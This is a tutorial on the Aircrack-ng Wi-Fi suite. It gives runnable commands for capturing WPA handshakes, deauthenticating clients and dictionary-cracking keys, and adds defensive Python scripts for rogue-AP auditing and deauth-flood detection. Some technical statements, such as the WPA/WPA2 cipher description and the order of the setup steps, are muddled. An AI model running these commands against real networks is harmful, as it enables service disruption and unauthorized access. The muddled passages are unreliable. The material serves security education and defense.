Aircrack-ng Hacks and Enhances Wi-Fi Network Security


Disclaimer: Hacking, or even scanning, a system without permission carries legal penalties, including jail time for violating the Computer Fraud & Abuse Act. Obtaining permission first is mandatory, with no exceptions. This tutorial is purely educational and is meant to help you defend your networks better.

Aircrack-ng is primarily an offensive tool that lets you attack, gain access to, and ultimately defend WiFi networks. It is an 802.11 WEP and WPA/WPA2-PSK key cracking program used by ethical hackers and security professionals to test the security of wireless networks. Aircrack-ng is primarily a command-line tool, but many GUIs have been built on top of it. It works on Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Solaris, and eComStation 2, and it is preinstalled on Kali Linux. It is the best-known tool available for cracking WEP and WPA-PSK on Windows, so knowing how to use Aircrack-ng and its associated tools is important for the penetration tester. Aircrack-ng is designed to work with the WEP (Wired Equivalent Privacy) and WPA/WPA2 (Wi-Fi Protected Access) encryption protocols. Its primary purpose is to help ethical hackers and security professionals test the security of wireless networks by cracking WEP and WPA keys, creating fake access points, capturing and analyzing network traffic, and performing various other network-based attacks. It is used to assess the security posture of your wireless network, identify vulnerabilities, and test the strength of your network's encryption. Additionally, Aircrack-ng can be used to identify rogue access points, simulate various attack scenarios, and perform penetration testing tasks.

Components of Aircrack-ng:

Airmon-ng: It is used to enable monitor mode on a wireless adapter, allowing you to capture network traffic. Monitor mode lets your wireless adapter listen to all the Wi-Fi traffic in the air, even outside the network your device belongs to. This is crucial for capturing packets, analyzing network traffic, and injecting packets into the target network when needed. It sets the stage for the other tools in the Aircrack-ng suite, such as airodump-ng, aireplay-ng, and aircrack-ng itself.

Monitor mode is the state in which your device receives all packets within range of the WiFi adapter, even those not addressed to your machine's MAC address, whereas in managed mode the device only receives packets directed to its own MAC address. Once monitor mode is established, the wireless security test can be performed. This begins by identifying the interface name of your wireless adapter (e.g., wlan0) using the ifconfig and iwconfig commands. Once you have the interface name, you can enable monitor mode with the airmon-ng start command followed by the interface name.

Airodump-ng: It is used once airmon-ng has put the adapter into monitor mode. It captures network traffic, focusing on identifying wireless networks and capturing data packets. Once packets have been captured, the network can be analyzed to identify the connected devices and to obtain as much security information as possible, such as encryption details and handshakes. It allows you to gather valuable information about the target network and its clients, which helps you understand the network's structure and identify potential vulnerabilities. Using airodump-ng involves running the tool with the monitor interface (e.g., wlan0mon) and specifying parameters such as the channel to monitor, the BSSID to filter on, and the output file prefix for the captured data. Once started, airodump-ng displays live information about the networks and clients it detects.

When airodump-ng is used effectively, it gathers the essential data (such as AP and client MAC addresses) needed for further analysis and sets you up for more advanced attacks or security assessments with the other tools in the Aircrack-ng suite.

Airgraph-ng: It generates graphical representations of network traffic from captured data, giving a visual picture of the access points and their associated clients. These visualizations help you understand the relationships between networks and devices, making it easier to identify potential targets and vulnerabilities. Airgraph-ng is used after capturing packets with airodump-ng: it takes the CSV file generated by airodump-ng as input and writes the generated graph to an output file you specify. Seeing the captured data in graphical form gives a clearer understanding of the network's structure, which helps you plan and execute more targeted and effective attacks or security assessments.
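As an added illustration (not part of the original article and not code from the Aircrack-ng project), the following Python script parses the CSV file that airodump-ng writes next to its capture, the same file airgraph-ng consumes, and audits it from the defender's side: it flags access points advertising the corporate ESSID from a BSSID that is not on the allowlist (evil-twin or rogue AP candidates), APs still running WEP or no encryption at all, and clients seen associated with a rogue AP. The CSV sample, the ESSID "CorpWiFi" and the allowlist are constructed for the example; the column layout follows the headers airodump-ng writes, with the assumption that the AP table and the station table are separated by one blank line.

```python
import csv
import io

# Constructed sample in the layout airodump-ng uses for its <prefix>-01.csv file
# (assumption: an access-point table, one blank line, then a station table).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 12:00:00, 2024-01-01 12:05:00,  1,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   8, CorpWiFi, 
66:77:88:99:AA:BB, 2024-01-01 12:01:00, 2024-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -35,       80,        0,   0.  0.  0.  0,   8, CorpWiFi, 
CC:DD:EE:FF:00:11, 2024-01-01 12:02:00, 2024-01-01 12:05:00, 11,  54, WEP, WEP, , -60,       30,      400,   0.  0.  0.  0,   6, Legacy, 
22:33:44:55:66:77, 2024-01-01 12:02:30, 2024-01-01 12:05:00,  9,  54, OPN, , , -70,       10,        0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-01-01 12:00:10, 2024-01-01 12:04:50, -55,       35, 00:11:22:33:44:55, CorpWiFi
DE:AD:BE:EF:00:01, 2024-01-01 12:01:10, 2024-01-01 12:04:55, -50,       12, 66:77:88:99:AA:BB, CorpWiFi,Home
"""

# Constructed allowlist: the ESSID our managed APs broadcast and their BSSIDs.
CORP_ESSID = "CorpWiFi"
AUTHORISED_BSSIDS = {"00:11:22:33:44:55"}


def _read_table(block):
    """Parse one comma-separated table into a list of {column: value} dicts."""
    rows = list(csv.reader(io.StringIO(block.strip()), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    records = []
    for row in rows[1:]:
        if not any(row):
            continue
        row = [c.strip() for c in row]
        # A probed-ESSID list (or an ESSID) can itself contain commas; fold any
        # surplus fields back into the last column instead of mis-aligning.
        if len(row) > len(header):
            row = row[:len(header) - 1] + [",".join(row[len(header) - 1:])]
        row += [""] * (len(header) - len(row))
        records.append(dict(zip(header, row)))
    return records


def parse_airodump_csv(text):
    """Split the file into its AP and station tables and parse both."""
    text = text.replace("\r\n", "\n").strip()
    ap_block, _, station_block = text.partition("\n\n")
    return _read_table(ap_block), _read_table(station_block)


def audit(aps, stations, corp_essid=CORP_ESSID, authorised=AUTHORISED_BSSIDS):
    """Return (kind, address, detail) findings a defender would act on."""
    findings = []
    for ap in aps:
        if ap["ESSID"] == corp_essid and ap["BSSID"] not in authorised:
            findings.append(("rogue_ap", ap["BSSID"],
                             f"unmanaged AP advertising {corp_essid} on channel {ap['channel']}"))
        if ap["Privacy"] in ("WEP", "OPN"):
            findings.append(("weak_encryption", ap["BSSID"],
                             f"{ap['ESSID'] or '<hidden>'} uses {ap['Privacy']}"))
    rogue = {addr for kind, addr, _ in findings if kind == "rogue_ap"}
    for st in stations:
        if st["BSSID"] in rogue:
            findings.append(("client_on_rogue_ap", st["Station MAC"],
                             f"associated with rogue AP {st['BSSID']}"))
    return findings


def audit_capture(text):
    """Convenience wrapper: parse an airodump-ng CSV and audit it."""
    aps, stations = parse_airodump_csv(text)
    return audit(aps, stations)


if __name__ == "__main__":
    for kind, addr, detail in audit_capture(SAMPLE_CSV):
        print(f"{kind:20} {addr}  {detail}")
```

Run against a real file, point audit_capture at the contents of the -01.csv that airodump-ng produced and replace the allowlist with the BSSIDs of your own access points; an ESSID match from an unknown BSSID is the signature of an evil twin, and the station table tells you which of your users have already attached to it.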

Aireplay-ng: "Hackplay" begins here. This phase creates network traffic and performs various attacks, such as deauthentication and packet injection, to manipulate network behavior. This can be used to speed up the cracking process, force client disconnections, or test network security by injecting custom packets. You would use aireplay-ng after capturing packets with airodump-ng and analyzing the network traffic. The deauthentication attack sends disassociate packets to one or more clients that are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is "cloaked".

Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate.

Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected).

Of course, this attack is totally useless if there are no associated wireless clients or on fake authentications. A deauth or deauthentication attack disrupts connections between users and Wi-Fi access points. Attackers force devices to lose access and then reconnect to a network they control. Done by hand, a Wi-Fi deauthentication attack consists of the following steps:

Find the MAC address of the target network's access point.

Find the MAC address of the target client you wish to disconnect.

Change the MAC address of your wireless interface to match the target client's MAC address.

Send a request to the target network's access point, requesting to disconnect from the network.

Change the MAC address of your wireless interface to match the target network's access point.

Send a request to the target client, requesting it to disconnect from the network.

This process is very cumbersome, but fortunately it can be automated using aireplay-ng, which is part of the Aircrack-ng suite.

Run aireplay-ng in your terminal. Here is an example:

aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 -c 00:AA:BB:CC:DD:EE wlan0

or

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send multiple if you wish)

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing

ath0 is the interface name

Here is typical output:


12:35:25  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9

12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

Let's break down the parameters of the first example:

--deauth specifies that you wish to run a deauthentication attack.

1000 is the number of requests you wish to send. You can send one or many. In this example we are sending 1000. The larger the number, the longer the attack will last.

-a 00:11:22:33:44:55 is the MAC address of the target access point.

-c 00:AA:BB:CC:DD:EE is the MAC address of the target client.

wlan0 is the wireless interface you are running in monitor mode.

When you execute a deauthentication (deauth) attack with aireplay-ng, the tool sends a series of deauthentication frames to the target device and access point. These frames mimic legitimate management frames from the access point or the client device, instructing the two to disconnect from each other. As a result, the target device is disconnected from the WiFi network and is forced to re-establish the connection, which can be used to capture the handshake.

Using aireplay-ng involves specifying the attack type, the target network, and the parameters relevant to that attack. You may need to provide the monitor interface (e.g., wlan0mon) and the MAC addresses of the target access point and client devices. Used effectively, aireplay-ng lets you manipulate wireless network traffic, test network security, and gather additional information to aid in cracking WiFi encryption or identifying vulnerabilities.
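To show what the deauthentication attack looks like from the monitoring side, here is an added Python example (not from the original article and not part of the Aircrack-ng suite) implementing a simple deauthentication-flood detector of the kind a wireless IDS runs: it counts deauthentication and disassociation management frames per BSSID in a sliding one-second window, raises an alert once the count crosses a threshold, and records the targeted clients and whether any frame was addressed to the broadcast address. The frame records are constructed inline (a burst modelled on the 64 directed deauths in the aireplay-ng output above, plus benign frames); in practice they would be read from a monitor-mode pcap, with dst, src and bssid mapping to addr1, addr2 and addr3 of the 802.11 header. The window and threshold are tunable assumptions.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

# 802.11 management-frame subtypes (frame type 0) that this detector cares about
BEACON, DISASSOC, DEAUTH = 8, 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class MgmtFrame:
    ts: float      # capture timestamp in seconds
    subtype: int   # management frame subtype
    dst: str       # addr1: receiver address
    src: str       # addr2: claimed transmitter address
    bssid: str     # addr3: BSSID the frame belongs to


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Sliding-window counter: one alert per BSSID once `threshold` or more
    deauth/disassoc frames fall inside any `window`-second span."""
    recent = defaultdict(deque)   # per-BSSID frames still inside the window
    alerts = {}
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[f.bssid]
        q.append(f)
        while f.ts - q[0].ts > window:   # drop frames that aged out of the window
            q.popleft()
        if len(q) < threshold:
            continue
        a = alerts.setdefault(f.bssid, {
            "bssid": f.bssid, "first_ts": q[0].ts, "last_ts": f.ts,
            "count": 0, "targets": set(), "broadcast": False})
        a["last_ts"] = f.ts
        a["count"] = max(a["count"], len(q))          # peak frames seen in one window
        a["targets"].update(x.dst for x in q)
        a["broadcast"] = a["broadcast"] or any(x.dst == BROADCAST for x in q)
    for a in alerts.values():
        a["targets"] = sorted(a["targets"])
    return list(alerts.values())


def constructed_capture():
    """Constructed frame log: a 64-frame directed deauth burst spoofed in the name
    of one AP, a couple of benign kicks from another AP minutes apart, and beacons."""
    ap, victim = "00:14:6c:7e:40:80", "00:0f:b5:ae:ce:9d"
    ap2, other = "50:d4:f7:e5:66:f4", "aa:bb:cc:dd:ee:ff"
    frames = [MgmtFrame(90.0 + i * 0.1, BEACON, BROADCAST, ap, ap) for i in range(20)]
    frames += [MgmtFrame(100.0 + i * 0.008, DEAUTH, victim, ap, ap) for i in range(64)]
    frames.append(MgmtFrame(30.0, DEAUTH, other, ap2, ap2))       # e.g. idle timeout
    frames.append(MgmtFrame(250.0, DISASSOC, other, ap2, ap2))    # minutes later: benign
    return frames


if __name__ == "__main__":
    for a in detect_deauth_flood(constructed_capture()):
        print(f"deauth flood on {a['bssid']}: {a['count']} frames in "
              f"{a['last_ts'] - a['first_ts']:.3f}s, targets={a['targets']}, "
              f"broadcast={a['broadcast']}")
```

Rate alone cannot tell an attacker apart from an access point that really is kicking a client, so the alert carries the target list and the broadcast flag for an analyst to weigh; a legitimate AP has little reason to deauthenticate the broadcast address. The structural mitigation is 802.11w Protected Management Frames (mandatory in WPA3), which lets clients discard unauthenticated deauthentication frames; where it cannot be enabled, a detector like this is how the attack gets noticed.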

Aircrack-ng: The flagship tool that cracks WEP and WPA/WPA2 encryption keys, allowing you to assess the strength of your network's security. It employs various algorithms and techniques to recover encryption keys, enabling you to gain unauthorized access to a wireless network or verify the strength of your own network's security. Once you have adequate information, such as a WPA handshake or a sufficient number of WEP IVs (Initialization Vectors), you can run aircrack-ng with a dictionary to try to recover the key. Using aircrack-ng involves providing the captured data (in .cap format) and specifying the attack parameters, such as the dictionary file or the key length for brute-force attacks. The tool then analyzes the captured data and attempts to recover the encryption key.

Airbase-ng: Creates fake access points for testing network security, performing man-in-the-middle attacks, or social engineering purposes. This tool incorporates handshake capture, packet manipulation, and traffic injection attacks, among others. It supports various attack types, including deauthentication, fake authentication, and ARP request injection, which can help facilitate different stages of wireless security assessments or ethical hacking operations. By emulating legitimate access points, airbase-ng can trick nearby devices into connecting to the fake AP, allowing you to monitor or manipulate their network traffic. Use airbase-ng after gathering information about the target network and clients using tools like airodump-ng and aireplay-ng. Once you have identified a suitable target, airbase-ng can be employed to create a fake access point, luring unsuspecting users into connecting and potentially revealing sensitive information.

Encrypting and decrypting packets: Airbase-ng can encrypt and decrypt packets.

Filtering packets: Airbase-ng can filter packets by SSID or client MAC addresses.

Manipulating and resending packets: Airbase-ng can manipulate and resend packets.

Airdecap-ng: With this tool, you can decrypt WEP/WPA/WPA2 capture files when you know the key. It is also used to remove the wireless headers from an unencrypted wireless capture. This tool is particularly useful if you have an encrypted capture file you wish to scan for usernames, passwords, and other valuable data.

Airdrop-ng: A program used to deauthenticate users from access points. It uses rule-based deauthentication, where rules can match on MAC address, type of hardware, etc.

Airolib-ng: A tool designed to store and manage ESSID and password lists, calculate their Pairwise Master Keys (PMKs), and use them in WPA/WPA2 cracking.

Airtun-ng: This tool creates a virtual tunnel interface. It has two basic functions: allowing all encrypted traffic to be monitored by a wireless intrusion detection system (WIDS), and injecting arbitrary traffic into a network.

Besside-ng: It is used to automatically crack WEP and WPA networks.

Dcrack-ng: It is used to distribute the WPA2-PSK cracking process across multiple servers.

Easside-ng: This tool is a magic tool that allows you to communicate with a WEP access point without knowing its WEP key. It sends out transmissions over a WEP network without using the network's encryption system.


Makeivs-ng: Creates an IVS file, given a WEP key, for use in test scenarios.

Packetforge-ng: This tool is used to create encrypted packets to be used for packet injection. Using this tool, we can create various types of packets like ARP requests, UDP, ICMP and custom packets. It encrypts the forged packets with the encryption scheme used by the network so that they can then be transmitted.

Wesside-ng: It is another auto-magic tool that uses a variety of techniques to get the WEP key. It is the central cracking module that determines the encryption key needed to access a WEP-protected network.

Buddy-ng: It is a receiver program that works with easside-ng.

Airolib-ng manages lists of ESSIDs and passwords for use in encryption and authentication/credentials cracking.

Airserv-ng allows access to the wireless NIC from other computers.

wpaclean – Remove excess data from a pcap file

kstats – show statistical FMS algorithm votes for an ivs dump and a specified WEP key

makeivs-ng – Generates initialization vectors

The action plan is broken down into the following parts.

Download and install the latest required dependencies and aircrack-ng:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

$ wget https://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O - | tar -xz

$ cd aircrack-ng-1.2-rc4

$ make

$ sudo make install

Test that your adapter can inject packets and that WiFi networks are within range (the interface must already be in monitor mode for this test):

$ sudo aireplay-ng --test wlan0

Stop all the processes that use the wireless interface and start the wireless interface in monitor mode using airmon-ng (depending on the airmon-ng version, the monitor interface it creates is named mon0 or wlan0mon; the commands below use both names):

$ sudo airmon-ng check kill

$ sudo airmon-ng start wlan0

Start airodump-ng on the monitor interface to list the nearby access points and their clients:

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Collect the authentication handshake for the access point we are interested in by running airodump-ng on the AP's channel with a filter for its BSSID:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

or

$ sudo airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0

Wait until airodump-ng captures a handshake. To speed this up, you can send the wireless client a message saying that it is no longer associated with the AP (the deauthentication step below). When you see "WPA handshake: 00:11:22:33:44:55" in the top right-hand corner of the screen, airodump-ng has successfully captured the handshake.

Use aireplay-ng to deauthenticate the wireless client.

Run aircrack-ng to recover the WiFi password by cracking the authentication handshake.

Send deauth to broadcast:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed deauth (the attack is more effective when it is targeted):

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

or

$ sudo aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0

Crack the WPA/WPA2-PSK with the following command:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Conclusion: With all of WiFi's benefits, it is also a vulnerable network that can expose our private information if we are not careful. Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. The only difference between WPA and WPA2 is that they use the Rivest Cipher (RC4) and Advanced Encryption Standard (AES) encryption algorithms respectively. Both can be configured to use Counter Mode with CBC-MAC (CCM), though. They are by far considered the most secure options for WiFi networks. One of the very nice features of aircrack-ng is the ability to crack WEP without any authenticated clients. If the wireless network is completely standalone and there is no traffic whatsoever going across it, you will not be able to collect the data necessary for cracking the WEP encryption. Some modern access points and routers employ additional security measures that make them more resistant to Aircrack-ng attacks, and newer wireless protocols like WPA3 are designed to be more secure and less vulnerable to cracking tools.

To crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, fiber, etc.) or wireless (WiFi, Bluetooth, etc.) connection to share resources. Whether you are on a wired or wireless network, one device is always considered the server; on a home network, for example, the server is the router/access point. To connect to the internet, a device sends a request to the router, which in turn fetches what you want from the Internet. The data transmitted between the client and the access point is known as packets.
